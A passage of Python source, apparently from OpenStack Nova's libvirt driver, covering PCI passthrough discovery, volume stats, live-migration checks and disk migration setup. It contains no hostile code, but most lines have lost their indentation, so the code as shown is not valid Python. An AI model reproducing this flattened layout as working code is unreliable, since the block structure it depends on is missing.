# libvirt capabilities XML into a special JSON format ?
# The data format is different across all the drivers
# so we could just return the raw capabilities XML
# which 'compare_cpu' could use directly
#
# That said, arch_filter.py now seems to rely on
# the libvirt drivers format which suggests this
# data format needs to be standardized across drivers
return jsonutils.dumps(cpu_info)
def _get_pcidev_info(self, devname):
"""Returns a dict of PCI device."""
def _get_device_type(cfgdev):
"""Get a PCI device's device type.
An assignable PCI device can be a normal PCI device,
a SR-IOV Physical Function (PF), or a SR-IOV Virtual
Function (VF). Only normal PCI devices or SR-IOV VFs
are assignable, while SR-IOV PFs are always owned by
hypervisor.
Please notice that a PCI device with SR-IOV
capability but not enabled is reported as normal PCI device.
"""
for fun_cap in cfgdev.pci_capability.fun_capability:
if len(fun_cap.device_addrs) != 0:
if fun_cap.type == 'virt_functions':
return {'dev_type': 'type-PF'}
if fun_cap.type == 'phys_function':
phys_address = "%s:%s:%s.%s" % (
fun_cap.device_addrs[0][0].replace("0x", ''),
fun_cap.device_addrs[0][1].replace("0x", ''),
fun_cap.device_addrs[0][2].replace("0x", ''),
fun_cap.device_addrs[0][3].replace("0x", ''))
return {'dev_type': 'type-VF',
'phys_function': phys_address}
return {'dev_type': 'type-PCI'}
virtdev = self._conn.nodeDeviceLookupByName(devname)
xmlstr = virtdev.XMLDesc(0)
cfgdev = vconfig.LibvirtConfigNodeDevice()
cfgdev.parse_str(xmlstr)
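        # Render the canonical PCI address in domain:bus:slot.function form.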
address = "%04x:%02x:%02x.%1x" % (
cfgdev.pci_capability.domain,
cfgdev.pci_capability.bus,
cfgdev.pci_capability.slot,
cfgdev.pci_capability.function)
device = {
"dev_id": cfgdev.name,
"address": address,
"product_id": cfgdev.pci_capability.product_id[2:6],
"vendor_id": cfgdev.pci_capability.vendor_id[2:6],
}
# requirement by DataBase Model
device['label'] = 'label_%(vendor_id)s_%(product_id)s' % device
device.update(_get_device_type(cfgdev))
return device
def _pci_device_assignable(self, device):
if device['dev_type'] == 'type-PF':
return False
return self.dev_filter.device_assignable(device)
def _get_pci_passthrough_devices(self):
"""Get host PCI devices information.
Obtains pci devices information from libvirt, and returns
as a JSON string.
Each device information is a dictionary, with mandatory keys
of 'address', 'vendor_id', 'product_id', 'dev_type', 'dev_id',
'label' and other optional device specific information.
Refer to the objects/pci_device.py for more idea of these keys.
        :returns: a JSON string containing a list of the assignable PCI
devices information
"""
# Bail early if we know we can't support `listDevices` to avoid
# repeated warnings within a periodic task
if not getattr(self, '_list_devices_supported', True):
return jsonutils.dumps([])
try:
dev_names = self._conn.listDevices('pci', 0) or []
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
self._list_devices_supported = False
LOG.warn(_LW("URI %(uri)s does not support "
"listDevices: " "%(error)s"),
{'uri': self.uri(), 'error': ex})
return jsonutils.dumps([])
else:
raise
pci_info = []
for name in dev_names:
pci_dev = self._get_pcidev_info(name)
if self._pci_device_assignable(pci_dev):
pci_info.append(pci_dev)
return jsonutils.dumps(pci_info)
def get_all_volume_usage(self, context, compute_host_bdms):
"""Return usage info for volumes attached to vms on
a given host.
"""
vol_usage = []
for instance_bdms in compute_host_bdms:
instance = instance_bdms['instance']
for bdm in instance_bdms['instance_bdms']:
vol_stats = []
mountpoint = bdm['device_name']
if mountpoint.startswith('/dev/'):
mountpoint = mountpoint[5:]
volume_id = bdm['volume_id']
LOG.debug("Trying to get stats for the volume %s",
volume_id)
vol_stats = self.block_stats(instance['name'], mountpoint)
if vol_stats:
stats = dict(volume=volume_id,
instance=instance,
rd_req=vol_stats[0],
rd_bytes=vol_stats[1],
wr_req=vol_stats[2],
wr_bytes=vol_stats[3],
flush_operations=vol_stats[4])
LOG.debug(
"Got volume usage stats for the volume=%(volume)s,"
" rd_req=%(rd_req)d, rd_bytes=%(rd_bytes)d, "
"wr_req=%(wr_req)d, wr_bytes=%(wr_bytes)d",
stats, instance=instance)
vol_usage.append(stats)
return vol_usage
def block_stats(self, instance_name, disk_id):
"""Note that this function takes an instance name."""
try:
domain = self._lookup_by_name(instance_name)
return domain.blockStats(disk_id)
except libvirt.libvirtError as e:
errcode = e.get_error_code()
LOG.info(_LI('Getting block stats failed, device might have '
'been detached. Instance=%(instance_name)s '
'Disk=%(disk)s Code=%(errcode)s Error=%(e)s'),
{'instance_name': instance_name, 'disk': disk_id,
'errcode': errcode, 'e': e})
except exception.InstanceNotFound:
LOG.info(_LI('Could not find domain in libvirt for instance %s. '
'Cannot get block stats for device'), instance_name)
def interface_stats(self, instance_name, iface_id):
"""Note that this function takes an instance name."""
domain = self._lookup_by_name(instance_name)
return domain.interfaceStats(iface_id)
def get_console_pool_info(self, console_type):
# TODO(mdragon): console proxy should be implemented for libvirt,
# in case someone wants to use it with kvm or
# such. For now return fake data.
return {'address': '127.0.0.1',
'username': 'fakeuser',
'password': 'fakepassword'}
def refresh_security_group_rules(self, security_group_id):
self.firewall_driver.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
self.firewall_driver.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
self.firewall_driver.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
self.firewall_driver.refresh_provider_fw_rules()
def get_available_resource(self, nodename):
"""Retrieve resource information.
This method is called when nova-compute launches, and
as part of a periodic task that records the results in the DB.
:param nodename: will be put in PCI device
:returns: dictionary containing resource info
"""
# Temporary: convert supported_instances into a string, while keeping
# the RPC version as JSON. Can be changed when RPC broadcast is removed
stats = self.get_host_stats(refresh=True)
stats['supported_instances'] = jsonutils.dumps(
stats['supported_instances'])
return stats
def check_instance_shared_storage_local(self, context, instance):
dirpath = libvirt_utils.get_instance_path(instance)
if not os.path.exists(dirpath):
return None
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug("Creating tmpfile %s to verify with other "
"compute node that the instance is on "
"the same shared storage.",
tmp_file, instance=instance)
os.close(fd)
return {"filename": tmp_file}
def check_instance_shared_storage_remote(self, context, data):
return os.path.exists(data['filename'])
def check_instance_shared_storage_cleanup(self, context, data):
fileutils.delete_if_exists(data["filename"])
def check_can_live_migrate_destination(self, context, instance,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
:returns: a dict containing:
:filename: name of the tmpfile under CONF.instances_path
:block_migration: whether this is block migration
:disk_over_commit: disk-over-commit factor on dest host
:disk_available_mb: available disk space on dest host
"""
disk_available_mb = None
if block_migration:
disk_available_gb = dst_compute_info['disk_available_least']
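            # Convert the destination's free space from GiB to MiB and
            # subtract the configured reserved headroom.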
disk_available_mb = \
(disk_available_gb * units.Ki) - CONF.reserved_host_disk_mb
# Compare CPU
source_cpu_info = src_compute_info['cpu_info']
self._compare_cpu(source_cpu_info)
# Create file on storage, to be checked on source host
filename = self._create_shared_storage_test_file()
return {"filename": filename,
"image_type": CONF.libvirt.images_type,
"block_migration": block_migration,
"disk_over_commit": disk_over_commit,
"disk_available_mb": disk_available_mb}
def check_can_live_migrate_destination_cleanup(self, context,
dest_check_data):
"""Do required cleanup on dest host after check_can_live_migrate calls
:param context: security context
"""
filename = dest_check_data["filename"]
self._cleanup_shared_storage_test_file(filename)
def check_can_live_migrate_source(self, context, instance,
dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
# Checking shared storage connectivity
        # if block migration, instances_path should not be on shared storage.
source = CONF.host
dest_check_data.update({'is_shared_block_storage':
self._is_shared_block_storage(instance, dest_check_data)})
dest_check_data.update({'is_shared_instance_path':
self._is_shared_instance_path(dest_check_data)})
if dest_check_data['block_migration']:
if (dest_check_data['is_shared_block_storage'] or
dest_check_data['is_shared_instance_path']):
reason = _("Block migration can not be used "
"with shared storage.")
raise exception.InvalidLocalStorage(reason=reason, path=source)
self._assert_dest_node_has_enough_disk(context, instance,
dest_check_data['disk_available_mb'],
dest_check_data['disk_over_commit'])
elif not (dest_check_data['is_shared_block_storage'] or
dest_check_data['is_shared_instance_path']):
reason = _("Live migration can not be used "
"without shared storage.")
raise exception.InvalidSharedStorage(reason=reason, path=source)
# NOTE(mikal): include the instance directory name here because it
# doesn't yet exist on the destination but we want to force that
# same name to be used
instance_path = libvirt_utils.get_instance_path(instance,
relative=True)
dest_check_data['instance_relative_path'] = instance_path
return dest_check_data
def _is_shared_block_storage(self, instance, dest_check_data):
"""Check if all block storage of an instance can be shared
between source and destination of a live migration.
Returns true if the instance is volume backed and has no local disks,
or if the image backend is the same on source and destination and the
backend shares block storage between compute nodes.
"""
if (CONF.libvirt.images_type == dest_check_data.get('image_type') and
self.image_backend.backend().is_shared_block_storage()):
return True
if (dest_check_data.get('is_volume_backed') and
not bool(jsonutils.loads(
self.get_instance_disk_info(instance['name'])))):
# pylint: disable E1120
return True
return False
def _is_shared_instance_path(self, dest_check_data):
"""Check if instance path is shared between source and
destination of a live migration.
"""
return self._check_shared_storage_test_file(
dest_check_data["filename"])
def _assert_dest_node_has_enough_disk(self, context, instance,
available_mb, disk_over_commit):
"""Checks if destination has enough disk for block migration."""
        # Libvirt supports the qcow2 disk format, which is usually compressed
        # on compute nodes.
        # A real (compressed) disk image may be enlarged to the "virtual
        # disk size", which is specified as the maximum disk size.
# (See qemu-img -f path-to-disk)
# Scheduler recognizes destination host still has enough disk space
# if real disk size < available disk size
# if disk_over_commit is True,
# otherwise virtual disk size < available disk size.
available = 0
if available_mb:
available = available_mb * units.Mi
ret = self.get_instance_disk_info(instance['name'])
disk_infos = jsonutils.loads(ret)
necessary = 0
if disk_over_commit:
for info in disk_infos:
necessary += int(info['disk_size'])
else:
for info in disk_infos:
necessary += int(info['virt_disk_size'])
# Check that available disk > necessary disk
if (available - necessary) < 0:
reason = (_('Unable to migrate %(instance_uuid)s: '
                        'Disk of instance is too large (available'
' on destination host:%(available)s '
'< need:%(necessary)s)') %
{'instance_uuid': instance['uuid'],
'available': available,
'necessary': necessary})
raise exception.MigrationPreCheckError(reason=reason)
def _compare_cpu(self, cpu_info):
"""Checks the host cpu is compatible to a cpu given by xml.
"xml" must be a part of libvirt.openAuth(...).getCapabilities().
        The return value follows virCPUCompareResult.
        If the return value is > 0, live migration can proceed.
'http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult'
:param cpu_info: json string of cpu feature from _get_cpu_info()
:returns:
None. if given cpu info is not compatible to this server,
raise exception.
"""
# NOTE(berendt): virConnectCompareCPU not working for Xen
if CONF.libvirt.virt_type == 'xen':
return 1
info = jsonutils.loads(cpu_info)
LOG.info(_LI('Instance launched has CPU info: %s'), cpu_info)
cpu = vconfig.LibvirtConfigCPU()
cpu.arch = info['arch']
cpu.model = info['model']
cpu.vendor = info['vendor']
cpu.sockets = info['topology']['sockets']
cpu.cores = info['topology']['cores']
cpu.threads = info['topology']['threads']
for f in info['features']:
cpu.add_feature(vconfig.LibvirtConfigCPUFeature(f))
u = "http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult"
m = _("CPU doesn't have compatibility.\n\n%(ret)s\n\nRefer to %(u)s")
        # if an unknown character exists in the xml, libvirt complains
try:
ret = self._conn.compareCPU(cpu.to_xml(), 0)
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
ret = unicode(e)
LOG.error(m, {'ret': ret, 'u': u})
if ret <= 0:
LOG.error(m, {'ret': ret, 'u': u})
raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u})
def _create_shared_storage_test_file(self):
"""Makes tmpfile under CONF.instances_path."""
dirpath = CONF.instances_path
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug("Creating tmpfile %s to notify to other "
"compute nodes that they should mount "
"the same storage.", tmp_file)
os.close(fd)
return os.path.basename(tmp_file)
def _check_shared_storage_test_file(self, filename):
"""Confirms existence of the tmpfile under CONF.instances_path.
        If the tmpfile cannot be confirmed, returns False.
"""
tmp_file = os.path.join(CONF.instances_path, filename)
if not os.path.exists(tmp_file):
return False
else:
return True
def _cleanup_shared_storage_test_file(self, filename):
"""Removes existence of the tmpfile under CONF.instances_path."""
tmp_file = os.path.join(CONF.instances_path, filename)
os.remove(tmp_file)
def ensure_filtering_rules_for_instance(self, instance, network_info):
"""Ensure that an instance's filtering rules are enabled.
When migrating an instance, we need the filtering rules to
be configured on the destination host before starting the
migration.
Also, when restarting the compute service, we need to ensure
that filtering rules exist for all running services.
"""
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance,
network_info)
# nwfilters may be defined in a separate thread in the case
# of libvirt non-blocking mode, so we wait for completion
timeout_count = range(CONF.live_migration_retry_count)
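        # The list acts as a simple countdown: one entry is popped per
        # one-second poll, so we wait at most live_migration_retry_count
        # seconds for the filter to appear.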
while timeout_count:
if self.firewall_driver.instance_filter_exists(instance,
network_info):
break
timeout_count.pop()
if len(timeout_count) == 0:
msg = _('The firewall filter for %s does not exist')
raise exception.NovaException(msg % instance.name)
greenthread.sleep(1)
def filter_defer_apply_on(self):
self.firewall_driver.filter_defer_apply_on()
def filter_defer_apply_off(self):
self.firewall_driver.filter_defer_apply_off()
def live_migration(self, context, instance, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Spawning live_migration operation for distributing high-load.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param dest: destination host
:param post_method:
post operation method.
expected nova.compute.manager._post_live_migration.
:param recover_method:
recovery method when any exception occurs.
expected nova.compute.manager._rollback_live_migration.
:param block_migration: if true, do block migration.
:param migrate_data: implementation specific params
"""
greenthread.spawn(self._live_migration, context, instance, dest,
post_method, recover_method, block_migration,
migrate_data)
def _correct_listen_addr(self, old_xml_str, listen_addrs):
# NB(sross): can't just use LibvirtConfigGuest#parse_str
# here b/c it doesn't capture the entire XML
# description
xml_doc = etree.fromstring(old_xml_str)
# change over listen addresses
for dev in xml_doc.findall('./devices/graphics'):
gr_type = dev.get('type')
listen_tag = dev.find('listen')
if gr_type in ('vnc', 'spice'):
if listen_tag is not None:
listen_tag.set('address', listen_addrs[gr_type])
if dev.get('listen') is not None:
dev.set('listen', listen_addrs[gr_type])
return etree.tostring(xml_doc)
def _check_graphics_addresses_can_live_migrate(self, listen_addrs):
LOCAL_ADDRS = ('0.0.0.0', '127.0.0.1', '::', '::1')
local_vnc = CONF.vncserver_listen in LOCAL_ADDRS
local_spice = CONF.spice.server_listen in LOCAL_ADDRS
if ((CONF.vnc_enabled and not local_vnc) or
(CONF.spice.enabled and not local_spice)):
raise exception.MigrationError(
_('Your libvirt version does not support the'
' VIR_DOMAIN_XML_MIGRATABLE flag or your'
' destination node does not support'
' retrieving listen addresses. In order'
' for live migration to work properly, you'
' must configure the graphics (VNC and/or'
' SPICE) listen addresses to be either'
' the catch-all address (0.0.0.0 or ::) or'
' the local address (127.0.0.1 or ::1).'))
if listen_addrs is not None:
dest_local_vnc = listen_addrs['vnc'] in LOCAL_ADDRS
dest_local_spice = listen_addrs['spice'] in LOCAL_ADDRS
if ((CONF.vnc_enabled and not dest_local_vnc) or
(CONF.spice.enabled and not dest_local_spice)):
LOG.warn(_('Your libvirt version does not support the'
' VIR_DOMAIN_XML_MIGRATABLE flag, and the '
' graphics (VNC and/or SPICE) listen'
' addresses on the destination node do not'
' match the addresses on the source node.'
' Since the source node has listen'
' addresses set to either the catch-all'
' address (0.0.0.0 or ::) or the local'
' address (127.0.0.1 or ::1), the live'
' migration will succeed, but the VM will'
' continue to listen on the current'
' addresses.'))
def _live_migration(self, context, instance, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
"""Do live migration.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param dest: destination host
:param post_method:
post operation method.
expected nova.compute.manager._post_live_migration.
:param recover_method:
recovery method when any exception occurs.
expected nova.compute.manager._rollback_live_migration.
:param block_migration: if true, do block migration.
:param migrate_data: implementation specific params
"""
# Do live migration.
try:
if block_migration:
flaglist = CONF.libvirt.block_migration_flag.split(',')
else:
flaglist = CONF.libvirt.live_migration_flag.split(',')
flagvals = [getattr(libvirt, x.strip()) for x in flaglist]
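            # OR the individual libvirt flag constants together into the single
            # bitmask expected by migrateToURI/migrateToURI2 below.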
logical_sum = reduce(lambda x, y: x | y, flagvals)
dom = self._lookup_by_name(instance["name"])
pre_live_migrate_data = (migrate_data or {}).get(
'pre_live_migration_result', {})
listen_addrs = pre_live_migrate_data.get('graphics_listen_addrs')
migratable_flag = getattr(libvirt, 'VIR_DOMAIN_XML_MIGRATABLE',
None)
if migratable_flag is None or listen_addrs is None:
self._check_graphics_addresses_can_live_migrate(listen_addrs)
dom.migrateToURI(CONF.libvirt.live_migration_uri % dest,
logical_sum,
None,
CONF.libvirt.live_migration_bandwidth)
else:
old_xml_str = dom.XMLDesc(migratable_flag)
new_xml_str = self._correct_listen_addr(old_xml_str,
listen_addrs)
dom.migrateToURI2(CONF.libvirt.live_migration_uri % dest,
None,
new_xml_str,
logical_sum,
None,
CONF.libvirt.live_migration_bandwidth)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Live Migration failure: %s"), e,
instance=instance)
recover_method(context, instance, dest, block_migration)
# Waiting for completion of live_migration.
timer = loopingcall.FixedIntervalLoopingCall(f=None)
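        # The looping call is created with f=None so the closure below can
        # reference `timer` (to stop it) before being attached as the callback
        # via `timer.f = wait_for_live_migration`.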
def wait_for_live_migration():
"""waiting for live migration completion."""
try:
self.get_info(instance)['state']
except exception.InstanceNotFound:
timer.stop()
post_method(context, instance, dest, block_migration,
migrate_data)
timer.f = wait_for_live_migration
timer.start(interval=0.5).wait()
def _fetch_instance_kernel_ramdisk(self, context, instance):
"""Download kernel and ramdisk for instance in instance directory."""
instance_dir = libvirt_utils.get_instance_path(instance)
if instance['kernel_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir, 'kernel'),
instance['kernel_id'],
instance['user_id'],
instance['project_id'])
if instance['ramdisk_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir,
'ramdisk'),
instance['ramdisk_id'],
instance['user_id'],
instance['project_id'])
def rollback_live_migration_at_destination(self, context, instance,
network_info,
block_device_info,
destroy_disks=True,
migrate_data=None):
"""Clean up destination node after a failed live migration."""
self.destroy(context, instance, network_info, block_device_info,
destroy_disks, migrate_data)
def pre_live_migration(self, context, instance, block_device_info,
network_info, disk_info, migrate_data=None):
"""Preparation live migration."""
# Steps for volume backed instance live migration w/o shared storage.
is_shared_block_storage = True
is_shared_instance_path = True
is_block_migration = True
instance_relative_path = None
if migrate_data:
is_shared_block_storage = migrate_data.get(
'is_shared_block_storage', True)
is_shared_instance_path = migrate_data.get(
'is_shared_instance_path', True)
is_block_migration = migrate_data.get('block_migration', True)
instance_relative_path = migrate_data.get('instance_relative_path')
if not (is_shared_instance_path and is_shared_block_storage):
# NOTE(mikal): live migration of instances using config drive is
# not supported because of a bug in libvirt (read only devices
# are not copied by libvirt). See bug/1246201
if configdrive.required_by(instance):
raise exception.NoLiveMigrationForConfigDriveInLibVirt()
if not is_shared_instance_path:
# NOTE(mikal): this doesn't use libvirt_utils.get_instance_path
# because we are ensuring that the same instance directory name
# is used as was at the source
if instance_relative_path:
instance_dir = os.path.join(CONF.instances_path,
instance_relative_path)
else:
instance_dir = libvirt_utils.get_instance_path(instance)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
if not is_shared_block_storage:
# Ensure images and backing files are present.
self._create_images_and_backing(context, instance,
instance_dir, disk_info)
if not (is_block_migration or is_shared_instance_path):
# NOTE(angdraug): when block storage is shared between source and
# destination and instance path isn't (e.g. volume backed or rbd
# backed instance), instance path on destination has to be prepared
# Touch the console.log file, required by libvirt.
console_file = self._get_console_log_path(instance)
libvirt_utils.file_open(console_file, 'a').close()
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
# Establishing connection to volume server.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_info = blockinfo.get_info_from_bdm(
CONF.libvirt.virt_type, vol)
self._connect_volume(connection_info, disk_info)
# We call plug_vifs before the compute manager calls
# ensure_filtering_rules_for_instance, to ensure bridge is set up
        # Retrying is necessary because requests come in continuously and
        # concurrent requests to iptables make it complain.
max_retry = CONF.live_migration_retry_count
for cnt in range(max_retry):
try:
self.plug_vifs(instance, network_info)
break
except processutils.ProcessExecutionError:
if cnt == max_retry - 1:
raise
else:
LOG.warn(_LW('plug_vifs() failed %(cnt)d. Retry up to '
'%(max_retry)d.'),
{'cnt': cnt,
'max_retry': max_retry},
instance=instance)
greenthread.sleep(1)
res_data = {'graphics_listen_addrs': {}}
res_data['graphics_listen_addrs']['vnc'] = CONF.vncserver_listen
res_data['graphics_listen_addrs']['spice'] = CONF.spice.server_listen
return res_data
def _create_images_and_backing(self, context, instance, instance_dir,
disk_info_json):
""":param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param instance_dir:
instance path to use, calculated externally to handle block
migrating an instance with an old style instance path
:param disk_info_json:
json strings specified in get_instance_disk_info
"""
if not disk_info_json:
disk_info = []
else:
disk_info = jsonutils.loads(disk_info_json)
for info in disk_info:
base = os.path.basename(info['path'])
# Get image type and create empty disk image, and
# create backing file in case of qcow2.
instance_disk = os.path.join(instance_dir, base)
if not info['backing_file'] and not os.path.exists(instance_disk):
libvirt_utils.create_image(info['type'], instance_disk,
info['virt_disk_size'])
elif info['backing_file']:
# Creating backing file follows same way as spawning instances.
cache_name = os.path.basename(info['backing_file'])
image = self.image_backend.image(instance,
instance_disk,
CONF.libvirt.images_type)
if cache_name.startswith('ephemeral'):
image.cache(fetch_func=self._create_ephemeral,
fs_label=cache_name,
os_type=instance["os_type"],
filename=cache_name,
size=info['virt_disk_size'],
ephemeral_size=instance['ephemeral_gb'])
elif cache_name.startswith('swap'):
inst_type = flavors.extract_flavor(instance)
swap_mb = inst_type['swap']
image.cache(fetch_func=self._create_swap,
filename="swap_%s" % swap_mb,
size=swap_mb * units.Mi,
swap_mb=swap_mb)
else:
image.cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=cache_name,
image_id=instance['image_ref'],
user_id=instance['user_id'],
project_id=instance['project_id'],
size=info['virt_disk_size'])
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
def post_live_migration(self, context, instance, block_device_info,
migrate_data=None):
# Disconnect from volume server
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self._disconnect_volume(connection_info, disk_dev)
def post_live_migration_at_source(self, context, instance, network_info):
"""Unplug VIFs from networks at source.
:param context: security context
:param instance: instance object reference
:param network_info: instance network information
"""
self.unplug_vifs(instance, network_info)
def post_live_migration_at_destination(self, context,
instance,
network_info,
block_migration=False,
block_device_info=None):
"""Post operation of live migration at destination host.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param network_info: instance network information
:param block_migration: if true, post operation of block_migration.
"""
# Define migrated instance, otherwise, suspend/destroy does not work.
dom_list = self._conn.listDefinedDomains()
if instance["name"] not in dom_list:
# In case of block migration, destination does not have
# libvirt.xml
disk_info = blockinfo.get_disk_info(
CONF.libvirt.virt_type, instance, block_device_info)
xml = self._get_guest_xml(context, instance,
network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
self._conn.defineXML(xml)
def _get_instance_disk_info(self, instance_name, xml,
block_device_info=None):
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
volume_devices = set()
for vol in block_device_mapping:
disk_dev = vol['mount_device'].rpartition("/")[2]
volume_devices.add(disk_dev)
disk_info = []
doc = etree.fromstring(xml)
disk_nodes = doc.findall('.//devices/disk')
path_nodes = doc.findall('.//devices/disk/source')
driver_nodes = doc.findall('.//devices/disk/driver')
target_nodes = doc.findall('.//devices/disk/target')
for cnt, path_node in enumerate(path_nodes):
disk_type = disk_nodes[cnt].get('type')
path = path_node.get('file')
target = target_nodes[cnt].attrib['dev']
if not path:
LOG.debug('skipping disk for %s as it does not have a path',
instance_name)
continue
if disk_type != 'file':
LOG.debug('skipping %s since it looks like volume', path)
continue
if target in volume_devices:
LOG.debug('skipping disk %(path)s (%(target)s) as it is a '
'volume', {'path': path, 'target': target})
continue
# get the real disk size or
# raise a localized error if image is unavailable
dk_size = int(os.path.getsize(path))
disk_type = driver_nodes[cnt].get('type')
if disk_type == "qcow2":
backing_file = libvirt_utils.get_disk_backing_file(path)
virt_size = disk.get_disk_size(path)
over_commit_size = int(virt_size) - dk_size
else:
backing_file = ""
virt_size = dk_size
over_commit_size = 0
disk_info.append({'type': disk_type,
'path': path,
'virt_disk_size': virt_size,
'backing_file': backing_file,
'disk_size': dk_size,
'over_committed_disk_size': over_commit_size})
return jsonutils.dumps(disk_info)
def get_instance_disk_info(self, instance_name,
block_device_info=None):
try:
dom = self._lookup_by_name(instance_name)
xml = dom.XMLDesc(0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
msg = (_('Error from libvirt while getting description of '
'%(instance_name)s: [Error Code %(error_code)s] '
'%(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
LOG.warn(msg)
raise exception.InstanceNotFound(instance_id=instance_name)
return self._get_instance_disk_info(instance_name, xml,
block_device_info)
def _get_disk_over_committed_size_total(self):
"""Return total over committed disk size for all instances."""
        # Disk size that all instances use: virtual_size - disk_size
disk_over_committed_size = 0
for dom in self._list_instance_domains():
try:
xml = dom.XMLDesc(0)
disk_infos = jsonutils.loads(
self._get_instance_disk_info(dom.name(), xml))
for info in disk_infos:
disk_over_committed_size += int(
info['over_committed_disk_size'])
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
LOG.warn(_LW(
'Error from libvirt while getting description of '
'%(instance_name)s: [Error Code %(error_code)s] %(ex)s'
) % {'instance_name': dom.name(),
'error_code': error_code,
'ex': ex})
except OSError as e:
if e.errno == errno.ENOENT:
LOG.warn(_LW('Periodic task is updating the host stat, '
'it is trying to get disk %(i_name)s, '
'but disk file was removed by concurrent '
'operations such as resize.'),
{'i_name': dom.name()})
if e.errno == errno.EACCES:
LOG.warn(_LW('Periodic task is updating the host stat, '
'it is trying to get disk %(i_name)s, '
'but access is denied. It is most likely '
'due to a VM that exists on the compute '
'node but is not managed by Nova.'),
{'i_name': dom.name()})
else:
raise
# NOTE(gtt116): give other tasks a chance.
greenthread.sleep(0)
return disk_over_committed_size
def unfilter_instance(self, instance, network_info):
"""See comments of same method in firewall_driver."""
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, run update the stats first.
"""
return self.host_state.get_host_stats(refresh=refresh)
def get_host_cpu_stats(self):
"""Return the current CPU state of the host."""
# Extract node's CPU statistics.
stats = self._conn.getCPUStats(libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._conn.getInfo()[3]
return stats
def get_host_uptime(self, host):
"""Returns the result of calling "uptime"."""
# NOTE(dprince): host seems to be ignored for this call and in
# other compute drivers as well. Perhaps we should remove it?
out, err = utils.execute('env', 'LANG=C', 'uptime')
return out
def manage_image_cache(self, context, all_instances):
"""Manage the local cache of images."""
self.image_cache_manager.update(context, all_instances)
def _cleanup_remote_migration(self, dest, inst_base, inst_base_resize,
shared_storage=False):
"""Used only for cleanup in case migrate_disk_and_power_off fails."""
try:
if os.path.exists(inst_base_resize):
utils.execute('rm', '-rf', inst_base)
utils.execute('mv', inst_base_resize, inst_base)
if not shared_storage:
utils.execute('ssh', dest, 'rm', '-rf', inst_base)
except Exception:
pass
def _is_storage_shared_with(self, dest, inst_base):
# NOTE (rmk): There are two methods of determining whether we are
# on the same filesystem: the source and dest IP are the
# same, or we create a file on the dest system via SSH
# and check whether the source system can also see it.
shared_storage = (dest == self.get_host_ip_addr())
if not shared_storage:
tmp_file = uuid.uuid4().hex + '.tmp'
tmp_path = os.path.join(inst_base, tmp_file)
try:
utils.execute('ssh', dest, 'touch', tmp_path)
if os.path.exists(tmp_path):
shared_storage = True
os.unlink(tmp_path)
else:
utils.execute('ssh', dest, 'rm', tmp_path)
except Exception:
pass
return shared_storage
def migrate_disk_and_power_off(self, context, instance, dest,
flavor, network_info,
block_device_info=None):
LOG.debug("Starting migrate_disk_and_power_off",
instance=instance)
# Checks if the migration needs a disk resize down.
for kind in ('root_gb', 'ephemeral_gb'):
if flavor[kind] < instance[kind]:
reason = _("Unable to resize disk down.")
raise exception.InstanceFaultRollback(
exception.ResizeError(reason=reason))
disk_info_text = self.get_instance_disk_info(instance['name'],
block_device_info=block_device_info)
disk_info = jsonutils.loads(disk_info_text)
# NOTE(dgenin): Migration is not implemented for LVM backed instances.
if (CONF.libvirt.images_type == 'lvm' and
not self._is_booted_from_volume(instance, disk_info_text)):
reason = "Migration is not supported for LVM backed instances"
raise exception.MigrationPreCheckError(reason)
# copy disks to destination
# rename instance dir to +_resize at first for using
# shared storage for instance dir (eg. NFS).
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
shared_storage = self._is_storage_shared_with(dest, inst_base)
